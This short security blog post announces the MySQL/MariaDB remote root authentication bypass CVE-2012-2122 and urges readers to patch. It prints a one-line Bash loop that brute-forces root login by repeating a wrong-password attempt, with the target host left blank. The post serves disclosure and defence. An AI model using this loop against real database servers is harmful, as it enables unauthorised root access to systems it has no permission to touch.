MySQL Remote Root Authentication Bypass (CVE-2012-2122)

Posted by:

A new vulnerability discovered in MySQL Server allow an attacker to gain remote root privileges. According to the original article posted on SC Magazine “Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.”

This critical vulnerability CVE-2012-2122 was already patched so you have to fix your MySQL server as soon as possible.

The pyton script is still available on Exploit-DB and can be converted in a single line Bash Script:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 2>/dev/null; done

Patch your MySQL ! :)



About the Author:

Andrea is a certified CISSP and OPST Security Expert with fourteen years experience, encompassing SIEM, malware analysis, investigating security incidents, computer and network forensics, ISO 27001/NIST/COBIT audits and hardening of various devices. He also develops FG-Scanner project and he's Clusit and ISC2 Italy member.
  Related Posts

Add a Comment